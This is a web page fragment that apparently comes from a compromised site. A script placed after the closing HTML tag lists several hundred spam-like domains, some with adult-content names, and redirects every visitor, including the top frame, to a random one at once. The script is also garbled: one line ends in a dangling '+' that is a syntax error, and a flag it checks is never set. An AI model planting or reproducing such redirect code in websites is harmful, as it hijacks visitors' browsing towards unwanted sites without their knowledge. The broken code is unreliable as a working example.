
</HTML><script>
var host = window.location.host.toLowerCase();
var url = new Array();
var url2 = "";


url.push("111qa.com");
url.push("111uj.com");
url.push("111ur.com");
url.push("111uy.com");
url.push("111vy.com");
url.push("222fv.com");
url.push("222qe.com");
url.push("222vu.com");
url.push("222vy.com");
url.push("2244ss.com");
url.push("279qq.com");
url.push("333uf.com");
url.push("333uj.com");
url.push("333vm.com");
url.push("4422vv.com");
url.push("444au.com");
url.push("444bh.com");
url.push("444bp.com");
url.push("444br.com");
url.push("444bv.com");
url.push("444cv.com");
url.push("444dn.com");
url.push("444dr.com");
url.push("444ef.com");
url.push("444eg.com");
url.push("444eh.com");
url.push("444ek.com");
url.push("444eq.com");
url.push("444eu.com");
url.push("444ew.com");
url.push("444ey.com");
url.push("444fp.com");
url.push("444fr.com");
url.push("444fv.com");
url.push("444gk.com");
url.push("444gq.com");
url.push("444gr.com");
url.push("444gv.com");
url.push("444gz.com");
url.push("444hn.com");
url.push("444hx.com");
url.push("444ja.com");
url.push("444jm.com");
url.push("444jx.com");
url.push("444mf.com");
url.push("444nc.com");
url.push("444nh.com");
url.push("444nm.com");
url.push("444nq.com");
url.push("444nr.com");
url.push("444ns.com");
url.push("444nt.com");
url.push("444pb.com");
url.push("444pf.com");
url.push("444qd.com");
url.push("444qf.com");
url.push("444qg.com");
url.push("444qj.com");
url.push("444qv.com");
url.push("444rf.com");
url.push("444rg.com");
url.push("444rj.com");
url.push("444rk.com");
url.push("444rm.com");
url.push("444rq.com");
url.push("444rs.com");
url.push("444rz.com");
url.push("444sn.com");
url.push("444sr.com");
url.push("444sv.com");
url.push("444sw.com");
url.push("444ua.com");
url.push("444uf.com");
url.push("444uj.com");
url.push("444uq.com");
url.push("444uy.com");
url.push("444vd.com");
url.push("444ve.com");
url.push("444vh.com");
url.push("444vj.com");
url.push("444vq.com");
url.push("444vu.com");
url.push("444vw.com");
url.push("444vy.com");
url.push("444vz.com");
url.push("444wn.com");
url.push("444wr.com");
url.push("444ws.com");
url.push("444wv.com");
url.push("444yf.com");
url.push("444yj.com");
url.push("444yk.com");
url.push("444yr.com");
url.push("444yv.com");
url.push("4477tt.com");
url.push("4499zz.com");
url.push("555vh.com");
url.push("555vp.com");
url.push("555vy.com");
url.push("555wv.com");
url.push("666vh.com");
url.push("777vj.com");
url.push("842d.com");
url.push("919gg.com");
url.push("9966yy.com");
url.push("ee1166.com");
url.push("ee2266.com");
url.push("ee3355.com");
url.push("ee5522.com");
url.push("ee809.com");
url.push("ee9911.com");
url.push("ee9955.com");
url.push("ff4499.com");
url.push("ff6611.com");
url.push("nn2266.com");
url.push("nn2299.com");
url.push("nn5511.com");
url.push("nn5577.com");
url.push("nn6611.com");
url.push("nn6633.com");
url.push("nn7711.com");
url.push("nn7722.com");
url.push("nn7755.com");
url.push("nn8811.com");
url.push("nn9911.com");
url.push("nn9922.com");
url.push("nn9933.com");
url.push("pp1177.com");
url.push("pp7733.com");
url.push("rr1177.com");
url.push("rr1199.com");
url.push("rr510.com");
url.push("rr5511.com");
url.push("rr7711.com");
url.push("rr7733.com");
url.push("rr9911.com");
url.push("vv3344.com");
url.push("yy335.com");
url.push("zz3311.com");
url.push("zz5533.com");
url.push("zz603.com");
url.push("zz6622.com");
url.push("zz703.com");
url.push("zz7722.com");
url.push("zz8811.com");
url.push("zz9933.com");
url.push("1133e.com");
url.push("2222hs.com");
url.push("2222pw.com");
url.push("2222tw.com");
url.push("3322z.com");
url.push("3333bu.com");
url.push("3333ps.com");
url.push("3333pw.com");
url.push("3333sc.com");
url.push("3333sz.com");
url.push("3333us.com");
url.push("3333xa.com");
url.push("33kkpp.com");
url.push("33kkyy.com");
url.push("33mmbb.com");
url.push("33yyuu.com");
url.push("4444dv.com");
url.push("4444gd.com");
url.push("4444hw.com");
url.push("4444sx.com");
url.push("4444tw.com");
url.push("4444tz.com");
url.push("4444us.com");
url.push("4444zj.com");
url.push("4499n.com");
url.push("44eepp.com");
url.push("44hhkk.com");
url.push("44jjzz.com");
url.push("44kkzz.com");
url.push("44zzyy.com");
url.push("5522t.com");
url.push("5555mb.com");
url.push("5555mv.com");
url.push("5555nf.com");
url.push("5555ph.com");
url.push("5555ps.com");
url.push("5555sw.com");
url.push("5555sz.com");
url.push("5555ta.com");
url.push("5555ts.com");
url.push("5555tu.com");
url.push("5555tw.com");
url.push("5555tz.com");
url.push("5555xa.com");
url.push("55bbmm.com");
url.push("55eenn.com");
url.push("55hhyy.com");
url.push("55kkzz.com");
url.push("55qqyy.com");
url.push("55zzyy.com");
url.push("6611j.com");
url.push("6611t.com");
url.push("6666de.com");
url.push("6666pv.com");
url.push("6666wu.com");
url.push("6666xa.com");
url.push("6666zh.com");
url.push("66yyee.com");
url.push("7722y.com");
url.push("7722z.com");
url.push("7777en.com");
url.push("7777pe.com");
url.push("7777ps.com");
url.push("7777ta.com");
url.push("7777us.com");
url.push("77aaee.com");
url.push("77aauu.com");
url.push("77bbdd.com");
url.push("77ccuu.com");
url.push("77ddbb.com");
url.push("77ddzz.com");
url.push("77eeaa.com");
url.push("77eeqq.com");
url.push("77eeuu.com");
url.push("77eezz.com");
url.push("77hhqq.com");
url.push("77hhuu.com");
url.push("77kkyy.com");
url.push("77ppuu.com");
url.push("77ppzz.com");
url.push("77qqdd.com");
url.push("77qqyy.com");
url.push("77ssdd.com");
url.push("77ttzz.com");
url.push("77uuaa.com");
url.push("77uubb.com");
url.push("77uucc.com");
url.push("77uudd.com");
url.push("77uuhh.com");
url.push("77uukk.com");
url.push("77uumm.com");
url.push("77uupp.com");
url.push("77uuqq.com");
url.push("77uuss.com");
url.push("77uuxx.com");
url.push("77uuyy.com");
url.push("77uuzz.com");
url.push("77yyqq.com");
url.push("77zzee.com");
url.push("77zzhh.com");
url.push("77zzpp.com");
url.push("77zzqq.com");
url.push("77zztt.com");
url.push("77zzuu.com");
url.push("8888az.com");
url.push("8888jq.com");
url.push("8888uz.com");
url.push("8888zv.com");
url.push("88ccuu.com");
url.push("88eess.com");
url.push("88eeuu.com");
url.push("88kkxx.com");
url.push("88kkzz.com");
url.push("88nnuu.com");
url.push("88ppuu.com");
url.push("88qqee.com");
url.push("88qqyy.com");
url.push("88ssuu.com");
url.push("88ttuu.com");
url.push("88uukk.com");
url.push("88uupp.com");
url.push("88uuyy.com");
url.push("88xxdd.com");
url.push("88yypp.com");
url.push("9999me.com");
url.push("99bbdd.com");
url.push("99bbuu.com");
url.push("99ccuu.com");
url.push("99ddzz.com");
url.push("99hhqq.com");
url.push("99hhzz.com");
url.push("99jjqq.com");
url.push("99jjuu.com");
url.push("99jjzz.com");
url.push("99kkqq.com");
url.push("99ppuu.com");
url.push("99qqhh.com");
url.push("99qqtt.com");
url.push("99ssuu.com");
url.push("99ttaa.com");
url.push("99ttmm.com");
url.push("99ttqq.com");
url.push("99ttuu.com");
url.push("99uuaa.com");
url.push("99uubb.com");
url.push("99uuhh.com");
url.push("99uukk.com");
url.push("99uupp.com");
url.push("99uutt.com");
url.push("99yyuu.com");
url.push("99zzcc.com");
url.push("99zzdd.com");
url.push("99zzhh.com");
url.push("99zzqq.com");
url.push("99zztt.com");
url.push("99zzuu.com");
url.push("ee5533.com");
url.push("ee8811.com");
url.push("nn2255.com");
url.push("nn6622.com");
url.push("nn9955.com");
url.push("qq7711.com");
url.push("rr6611.com");
url.push("mmm43.com");
url.push("a11q.com");
url.push("a12p.com");
url.push("a12q.com");
url.push("a13i.com");
url.push("a13j.com");
url.push("a13q.com");
url.push("a13t.com");
url.push("a13u.com");
url.push("a15b.com");
url.push("a15c.com");
url.push("a15f.com");
url.push("a15h.com");
url.push("a15j.com");
url.push("a15p.com");
url.push("a15q.com");
url.push("a15v.com");
url.push("a15x.com");
url.push("a16c.com");
url.push("a16f.com");
url.push("a16j.com");
url.push("a16k.com");
url.push("a16o.com");
url.push("a16p.com");
url.push("a16t.com");
url.push("a16w.com");
url.push("a17c.com");
url.push("a17d.com");
url.push("a17f.com");
url.push("a17g.com");
url.push("a17j.com");
url.push("a17m.com");
url.push("a17o.com");
url.push("a17p.com");
url.push("a17q.com");
url.push("a17t.com");
url.push("a17v.com");
url.push("a18h.com");
url.push("a18j.com");
url.push("a18l.com");
url.push("a18m.com");
url.push("a18p.com");
url.push("a18q.com");
url.push("a19b.com");
url.push("a19g.com");
url.push("a19j.com");
url.push("a19k.com");
url.push("a19l.com");
url.push("a19q.com");
url.push("a19r.com");
url.push("a19t.com");
url.push("a19u.com");
url.push("a19v.com");
url.push("a19w.com");
url.push("a19x.com");
url.push("a21d.com");
url.push("a21f.com");
url.push("a21j.com");
url.push("a21p.com");
url.push("a21x.com");
url.push("a23j.com");
url.push("a23l.com");
url.push("a23o.com");
url.push("a23r.com");
url.push("a23w.com");
url.push("a23y.com");
url.push("a25c.com");
url.push("a25d.com");
url.push("a25e.com");
url.push("a25f.com");
url.push("a25h.com");
url.push("a25j.com");
url.push("a25l.com");
url.push("a25m.com");
url.push("a25o.com");
url.push("a25q.com");
url.push("a25r.com");
url.push("a25w.com");
url.push("a26g.com");
url.push("a26h.com");
url.push("a26i.com");
url.push("a26j.com");
url.push("a26k.com");
url.push("a26m.com");
url.push("a26n.com");
url.push("a26o.com");
url.push("a26p.com");
url.push("a26q.com");
url.push("a26r.com");
url.push("a26t.com");
url.push("a26u.com");
url.push("a26w.com");
url.push("a26y.com");
url.push("a27g.com");
url.push("a27i.com");
url.push("a27j.com");
url.push("a27k.com");
url.push("a27n.com");
url.push("a27o.com");
url.push("a27q.com");
url.push("a27u.com");
url.push("a27v.com");
url.push("a27w.com");
url.push("a27x.com");
url.push("a27y.com");
url.push("a27z.com");
url.push("a28c.com");
url.push("a28e.com");
url.push("a28f.com");
url.push("a28g.com");
url.push("a28j.com");
url.push("a28l.com");
url.push("a28m.com");
url.push("a28p.com");
url.push("a28q.com");
url.push("a28r.com");
url.push("a28u.com");
url.push("a28w.com");
url.push("a28y.com");
url.push("a29c.com");
url.push("a29d.com");
url.push("a29e.com");
url.push("a29f.com");
url.push("a29g.com");
url.push("a29h.com");
url.push("a29k.com");
url.push("a29l.com");
url.push("a29p.com");
url.push("a29q.com");
url.push("a29r.com");
url.push("a29s.com");
url.push("a29t.com");
url.push("a29u.com");
url.push("a29y.com");
url.push("a29z.com");
url.push("a31c.com");
url.push("a31f.com");
url.push("a31h.com");
url.push("a31k.com");
url.push("a31n.com");
url.push("a31o.com");
url.push("a31q.com");
url.push("a31r.com");
url.push("a31t.com");
url.push("a31u.com");
url.push("a31w.com");
url.push("a31z.com");
url.push("a32c.com");
url.push("a32d.com");
url.push("a32f.com");
url.push("a32h.com");
url.push("a32i.com");
url.push("a32j.com");
url.push("a32k.com");
url.push("a32l.com");
url.push("a32m.com");
url.push("a32n.com");
url.push("a32o.com");
url.push("a32p.com");
url.push("a32q.com");
url.push("a32r.com");
url.push("a32s.com");
url.push("a32t.com");
url.push("a32u.com");
url.push("a32v.com");
url.push("a33l.com");
url.push("a35c.com");
url.push("a35d.com");
url.push("a35e.com");
url.push("a35f.com");
url.push("a35h.com");
url.push("a35i.com");
url.push("a35j.com");
url.push("a35k.com");
url.push("a35l.com");
url.push("a35o.com");
url.push("a35q.com");
url.push("a35r.com");
url.push("a35s.com");
url.push("a35t.com");
url.push("a35u.com");
url.push("a35w.com");
url.push("a35y.com");
url.push("a35z.com");
url.push("a36f.com");
url.push("a36g.com");
url.push("a36h.com");
url.push("a36i.com");
url.push("a36j.com");
url.push("a36l.com");
url.push("a36n.com");
url.push("a36o.com");
url.push("a36p.com");
url.push("a36q.com");
url.push("a36s.com");
url.push("a36w.com");
url.push("a36z.com");
url.push("a38d.com");
url.push("a38e.com");
url.push("a38f.com");
url.push("a38g.com");
url.push("a38i.com");
url.push("a38j.com");
url.push("a38l.com");
url.push("a38m.com");
url.push("a38n.com");
url.push("a38q.com");
url.push("a38u.com");
url.push("a38w.com");
url.push("a39b.com");
url.push("a39d.com");
url.push("a39e.com");
url.push("a39f.com");
url.push("a39g.com");
url.push("a39h.com");
url.push("a39i.com");
url.push("a39j.com");
url.push("a39k.com");
url.push("a39l.com");
url.push("a39m.com");
url.push("a39n.com");
url.push("a39o.com");
url.push("a39p.com");
url.push("a39q.com");
url.push("a39r.com");
url.push("a39w.com");
url.push("a39x.com");
url.push("a39z.com");
url.push("a51b.com");
url.push("a51c.com");
url.push("a51e.com");
url.push("a51g.com");
url.push("a51h.com");
url.push("a51k.com");
url.push("a51l.com");
url.push("a51o.com");
url.push("a51q.com");
url.push("a51t.com");
url.push("a51x.com");
url.push("a52d.com");
url.push("a52h.com");
url.push("a52k.com");
url.push("a52l.com");
url.push("a52n.com");
url.push("a52p.com");
url.push("a52q.com");
url.push("a52r.com");
url.push("a52s.com");
url.push("a52u.com");
url.push("a52y.com");
url.push("a53b.com");
url.push("435uu.com");
url.push("942uu.com");
url.push("8558c.com");
url.push("96uz.com");
url.push("485uu.com");
url.push("427xx.com");
url.push("462uu.com");
url.push("427uu.com");
url.push("649uu.com");
url.push("497uu.com");
url.push("kp47.com");
url.push("473uu.com");
url.push("394xx.com");
url.push("436uu.com");
url.push("873qq.com");
url.push("423uu.com");
url.push("46wc.com");
url.push("848zz.com");
url.push("428uu.com");
url.push("794uu.com");
url.push("653uu.com");
url.push("6758c.com");
url.push("498uu.com");
url.push("744zz.com");
url.push("452uu.com");
url.push("895qq.com");
url.push("538qq.com");
url.push("746uu.com");
url.push("482xx.com");
url.push("9758c.com");
url.push("642uu.com");
url.push("26ua.com");
url.push("453uu.com");
url.push("493uu.com");
url.push("797nn.com");
url.push("554ff.com");
url.push("sq14.com");
url.push("422ff.com");
url.push("828nn.com");
url.push("454ff.com");
url.push("43qf.com");
url.push("qv45.com");
url.push("542tt.com");
url.push("473ff.com");
url.push("232ff.com");
url.push("824ff.com");
url.push("jq94.com");
url.push("924mm.com");
url.push("346uu.com");
url.push("347uu.com");
url.push("362uu.com");
url.push("364uu.com");
url.push("374uu.com");
url.push("394kk.com");
url.push("434uu.com");
url.push("48ay.com");
url.push("48en.com");
url.push("48xu.com");
url.push("48zu.com");
url.push("498bb.com");
url.push("49yw.com");
url.push("49za.com");
url.push("49ze.com");
url.push("642zz.com");
url.push("64za.com");
url.push("684uu.com");
url.push("684zz.com");
url.push("74nc.com");
url.push("842yy.com");
url.push("ef74.com");
url.push("fe42.com");
url.push("mx46.com");
url.push("na83.com");
url.push("ns94.com");
url.push("pp438.com");
url.push("qq346.com");
url.push("qq423.com");
url.push("qq462.com");
url.push("qq494.com");
url.push("ut94.com");
url.push("uu252.com");
url.push("uu355.com");
url.push("uz72.com");
url.push("xx786.com");
url.push("xx858.com");
url.push("xx957.com");
url.push("za43.com");
url.push("26nh.com");
url.push("284tt.com");
url.push("34ta.com");
url.push("354uu.com");
url.push("395pp.com");
url.push("454tt.com");
url.push("497ff.com");
url.push("548uu.com");
url.push("587dd.com");
url.push("594pp.com");
url.push("63xq.com");
url.push("675uu.com");
url.push("684ff.com");
url.push("834ff.com");
url.push("845ff.com");
url.push("847ff.com");
url.push("849ff.com");
url.push("854ff.com");
url.push("874ff.com");
url.push("892uu.com");
url.push("934ff.com");
url.push("952hh.com");
url.push("983ee.com");
url.push("qq294.com");
url.push("qq384.com");
url.push("qq425.com");
url.push("qq472.com");
url.push("qq475.com");
url.push("qq476.com");
url.push("qq479.com");
url.push("qq482.com");
url.push("qq487.com");
url.push("qq493.com");
url.push("qq495.com");
url.push("qq497.com");
url.push("qq524.com");
url.push("qq574.com");
url.push("qq594.com");
url.push("qq629.com");
url.push("qq635.com");
url.push("qq642.com");
url.push("qq647.com");
url.push("qq683.com");
url.push("qq742.com");
url.push("qq754.com");
url.push("qq764.com");
url.push("qq784.com");
url.push("qq796.com");
url.push("qq824.com");
url.push("qq834.com");
url.push("qq851.com");
url.push("qq874.com");
url.push("qq924.com");
url.push("qq934.com");
url.push("qq952.com");
url.push("qq954.com");
url.push("269hh.com");
url.push("293hh.com");
url.push("323qq.com");
url.push("329pp.com");
url.push("346qq.com");
url.push("622qq.com");
url.push("637qq.com");
url.push("645qq.com");
url.push("672qq.com");
url.push("725uu.com");
url.push("794ff.com");
url.push("939uu.com");
url.push("946uu.com");
url.push("973cc.com");
url.push("526kk.com");
url.push("587qq.com");
url.push("589qq.com");
url.push("859tt.com");
url.push("889dd.com");
url.push("896yy.com");
url.push("946qq.com");
url.push("988qq.com");
url.push("243tt.com");
url.push("346tt.com");
url.push("347tt.com");
url.push("364tt.com");
url.push("439tt.com");
url.push("453hh.com");
url.push("473hh.com");
url.push("484tt.com");
url.push("485gg.com");
url.push("485tt.com");
url.push("489tt.com");
url.push("492tt.com");
url.push("493tt.com");
url.push("494tt.com");
url.push("495tt.com");
url.push("497tt.com");
url.push("498tt.com");
url.push("937hh.com");
url.push("hszy5.com");
url.push("hszy6.com");
url.push("hszy7.com");
url.push("hszy9.com");
url.push("22ggbb.com");
url.push("22nnqq.com");
url.push("22uupp.com");
url.push("22uuss.com");
url.push("22uutt.com");
url.push("22uuyy.com");
url.push("22uuzz.com");
url.push("22zzff.com");
url.push("22zznn.com");
url.push("22zzqq.com");
url.push("22zzuu.com");
url.push("33aaee.com");
url.push("33aatt.com");
url.push("33aauu.com");
url.push("33aazz.com");
url.push("33ccdd.com");
url.push("33ccff.com");
url.push("33ccuu.com");
url.push("33ccxx.com");
url.push("33ddnn.com");
url.push("33ddzz.com");
url.push("33eedd.com");
url.push("33ffqq.com");
url.push("44ddcc.com");
url.push("44ddff.com");
url.push("44ddnn.com");
url.push("44eebb.com");
url.push("44eess.com");
url.push("44kkqq.com");
url.push("44qqee.com");
url.push("44ttgg.com");
url.push("44uutt.com");
url.push("55ddff.com");
url.push("55ddkk.com");
url.push("55ddqq.com");
url.push("55ffcc.com");
url.push("55ggee.com");
url.push("55ggff.com");
url.push("55hhkk.com");
url.push("55mmtt.com");
url.push("55mmyy.com");
url.push("55nnqq.com");
url.push("55ppnn.com");
url.push("55ttgg.com");
url.push("55xxyy.com");
url.push("55yynn.com");
url.push("66aatt.com");
url.push("66ffcc.com");
url.push("66ggqq.com");
url.push("66mmtt.com");
url.push("66ttcc.com");
url.push("66ttff.com");
url.push("66ttkk.com");
url.push("66ttnn.com");
url.push("66uupp.com");
url.push("66yyhh.com");
url.push("77ccaa.com");
url.push("77ddff.com");
url.push("77ddnn.com");
url.push("77ffcc.com");
url.push("77ffdd.com");
url.push("77ffhh.com");
url.push("77ffnn.com");
url.push("77ffpp.com");
url.push("77ffqq.com");
url.push("77ffzz.com");
url.push("77ggff.com");
url.push("77ggnn.com");
url.push("77ggqq.com");
url.push("77ggzz.com");
url.push("77hhff.com");
url.push("77kkzz.com");
url.push("77mmtt.com");
url.push("77nndd.com");
url.push("77nnff.com");
url.push("77nngg.com");
url.push("77nnqq.com");
url.push("77nnuu.com");
url.push("77nnzz.com");
url.push("77ppbb.com");
url.push("77ppff.com");
url.push("77qqff.com");
url.push("77qqgg.com");
url.push("77qqhh.com");
url.push("77qqnn.com");
url.push("77qqpp.com");
url.push("77qqtt.com");
url.push("77sskk.com");
url.push("77ttnn.com");
url.push("77ttqq.com");
url.push("77ttss.com");
url.push("77uuff.com");
url.push("77uugg.com");
url.push("77uunn.com");
url.push("77yynn.com");
url.push("77zzdd.com");
url.push("77zzff.com");
url.push("77zzgg.com");
url.push("77zznn.com");
url.push("88eecc.com");
url.push("88ffqq.com");
url.push("88ffzz.com");
url.push("88hhee.com");
url.push("88mmyy.com");
url.push("88nnqq.com");
url.push("88nnzz.com");
url.push("88qqpp.com");
url.push("88ssdd.com");
url.push("88uudd.com");
url.push("88uuff.com");
url.push("88uuhh.com");
url.push("88uuzz.com");
url.push("88zzff.com");
url.push("88zznn.com");
url.push("99ddff.com");
url.push("99ddkk.com");
url.push("99ddqq.com");
url.push("99eeaa.com");
url.push("99eecc.com");
url.push("99eegg.com");
url.push("99eezz.com");
url.push("99ffaa.com");
url.push("99ffcc.com");
url.push("99ffnn.com");
url.push("99ffqq.com");
url.push("99fftt.com");
url.push("99ffzz.com");
url.push("99ggzz.com");
url.push("99mmuu.com");
url.push("99mmyy.com");
url.push("99nnff.com");
url.push("99nnqq.com");
url.push("99nntt.com");
url.push("99nnuu.com");
url.push("99nnzz.com");
url.push("99ppzz.com");
url.push("99qqdd.com");
url.push("99qqff.com");
url.push("99qqgg.com");
url.push("99qqnn.com");
url.push("99ttff.com");
url.push("99ttkk.com");
url.push("99ttzz.com");
url.push("99uuff.com");
url.push("99uugg.com");
url.push("99uunn.com");
url.push("99uuqq.com");
url.push("99uuzz.com");
url.push("99yynn.com");
url.push("99zzbb.com");
url.push("99zzff.com");
url.push("99zzgg.com");
url.push("99zznn.com");
url.push("244an.com");
url.push("244ce.com");
url.push("244en.com");
url.push("244gu.com");
url.push("244he.com");
url.push("244ke.com");
url.push("244na.com");
url.push("244ne.com");
url.push("244ta.com");
url.push("244te.com");
url.push("244wa.com");
url.push("244xu.com");
url.push("244za.com");
url.push("244ze.com");
url.push("244zu.com");
url.push("344an.com");
url.push("344ba.com");
url.push("344bu.com");
url.push("344ca.com");
url.push("344ce.com");
url.push("344da.com");
url.push("344de.com");
url.push("344fu.com");
url.push("344ke.com");
url.push("344ne.com");
url.push("344pu.com");
url.push("344ta.com");
url.push("344te.com");
url.push("344wa.com");
url.push("344ye.com");
url.push("344za.com");
url.push("344ze.com");
url.push("344zu.com");
url.push("366na.com");
url.push("422an.com");
url.push("422ba.com");
url.push("422bu.com");
url.push("422ca.com");
url.push("422ce.com");
url.push("422cu.com");
url.push("422da.com");
url.push("422en.com");
url.push("422fu.com");
url.push("422ge.com");
url.push("422gu.com");
url.push("422he.com");
url.push("422ke.com");
url.push("422na.com");
url.push("422ne.com");
url.push("422nu.com");
url.push("422pu.com");
url.push("422qu.com");
url.push("422su.com");
url.push("422ta.com");
url.push("422te.com");
url.push("422wa.com");
url.push("422wu.com");
url.push("422xu.com");
url.push("422ya.com");
url.push("422ye.com");
url.push("422za.com");
url.push("422ze.com");
url.push("422zu.com");
url.push("433ba.com");
url.push("433bu.com");
url.push("433ca.com");
url.push("433ce.com");
url.push("433cu.com");
url.push("433de.com");
url.push("433en.com");
url.push("433fa.com");
url.push("433fu.com");
url.push("433ge.com");
url.push("433gu.com");
url.push("433he.com");
url.push("433ke.com");
url.push("433na.com");
url.push("433ne.com");
url.push("433nu.com");
url.push("433pu.com");
url.push("433qu.com");
url.push("433su.com");
url.push("433ta.com");
url.push("433te.com");
url.push("433wa.com");
url.push("433wu.com");
url.push("433ya.com");
url.push("433ye.com");
url.push("433za.com");
url.push("433ze.com");
url.push("433zu.com");
url.push("455an.com");
url.push("455ba.com");
url.push("455bu.com");
url.push("455ca.com");
url.push("455ce.com");
url.push("455da.com");
url.push("455de.com");
url.push("455du.com");
url.push("455en.com");
url.push("455ge.com");
url.push("455gu.com");
url.push("455he.com");
url.push("455pa.com");
url.push("455su.com");
url.push("455za.com");
url.push("455ze.com");
url.push("455zu.com");
url.push("466an.com");
url.push("466bu.com");
url.push("466ca.com");
url.push("466ce.com");
url.push("466da.com");
url.push("466de.com");
url.push("466du.com");
url.push("466en.com");
url.push("466gu.com");
url.push("466he.com");
url.push("466ke.com");
url.push("466na.com");
url.push("466ne.com");
url.push("466nu.com");
url.push("466pu.com");
url.push("466qu.com");
url.push("466sa.com");
url.push("466ta.com");
url.push("466tu.com");
url.push("466wu.com");
url.push("466xu.com");
url.push("466za.com");
url.push("466ze.com");
url.push("466zu.com");
url.push("477an.com");
url.push("477ba.com");
url.push("477bu.com");
url.push("477ca.com");
url.push("477cu.com");
url.push("477da.com");
url.push("477du.com");
url.push("477en.com");
url.push("477fu.com");
url.push("477ge.com");
url.push("477gu.com");
url.push("477he.com");
url.push("477ke.com");
url.push("477na.com");
url.push("477ne.com");
url.push("477nu.com");
url.push("477pu.com");
url.push("477qu.com");
url.push("eu53.com");
url.push("eu85.com");
url.push("4567rr.com");
url.push("6789rr.com");
url.push("9999ddd.com");
url.push("avdouyin.com");
url.push("avkuaishou.com");
url.push("avtenxun.com");
url.push("duanziav.com");
url.push("dv444.com");
url.push("kv444.com");
url.push("toutiaoav.com");
url.push("ug444.com");
url.push("444dv.com");
url.push("46xw.com");
url.push("tn94.com");
url.push("82je.com");
url.push("294uu.com");
url.push("45dt.com");
url.push("696qq.com");
url.push("zx94.com");
url.push("qa54.com");
url.push("64ni.com");
url.push("958qq.com");
url.push("642yy.com");
url.push("xn42.com");
url.push("439uu.com");
url.push("45nu.com");
url.push("za444.com");
url.push("774yy.com");
url.push("qe84.com");
url.push("433ff.com");
url.push("73sv.com");
url.push("244ff.com");
url.push("34xb.com");
url.push("444xa.com");
url.push("zd74.com");
url.push("eu84.com");
url.push("45yv.com");
url.push("224ff.com");
url.push("qg74.com");
url.push("76ay.com");
url.push("43rp.com");
url.push("zm46.com");
url.push("461xx.com");

url2 = "http://"+escape(url[Math.floor(Math.random() * url.length)])+"?"+;
setTimeout('location.href=url2',0000);
for (var i = 0; i < url.length; i++) {
	if (host.indexOf(url[i]) >= 0) {
		istiao = "0"
	}
}
if (istiao == "1") {
	top.location.href = url2
}

  </script>



